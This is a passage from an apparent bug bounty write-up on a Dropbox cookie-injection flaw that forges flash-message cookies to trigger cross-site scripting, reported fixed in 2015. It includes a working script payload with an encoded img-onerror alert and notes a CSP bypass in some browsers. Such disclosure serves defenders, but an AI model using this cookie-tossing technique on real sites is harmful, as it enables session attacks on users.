However, although it cannot directly access to cookies on a main subdomain (www.dropbox.com), instead I can set any cookie on the global domain (.dropbox.com). It may be able to influence something on www.dropbox.com, using a cookie on dl-web.dropbox.com.
I found a some nice feature, Flash. It is a pop message appeared for 1-2 seconds, which is triggered by cookies. After cookies, “flash” and “bang”, are given, it draws a small message box containing a text written in cookie “flash”, and check the correctness of the ‘flash’ with cookie ‘bang’. The ‘bang’ seems like a hmac of “flash”. So, I need to find a correct “bang” value for my custom “flash”.
Now, I can make any flash messages with any text.
After upload a HTML file that assigns the malicious cookies given from the device unlink function, make victim to click your page. The flash meesage will appear and attack the victim when the victim opens a dropbox web page.
1 2 3 4 5 6 7 <script> document.cookie="bang=QUFEZGthYS1CaTNfWUpYcDUwdjNxemVHSHlhSHJkU3BEdnhKRUxOZVZ3b2ZoUQ%3D%3D; Domain=dropbox.com; Path=/;"; document.cookie="flash=b2s6PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KGRvY3VtZW50LmRvbWFpbik%2BIHVubGlua 2VkIHN1Y2Nlc3NmdWxseS4%3D; Domain=dropbox.com; Path=/"; location.href="https://dropbox.com/forgot"; </script>
There is a CSP. But, the script can be executed on IE or Safari.
2015/05/02 Fixed, a bounty of $1,331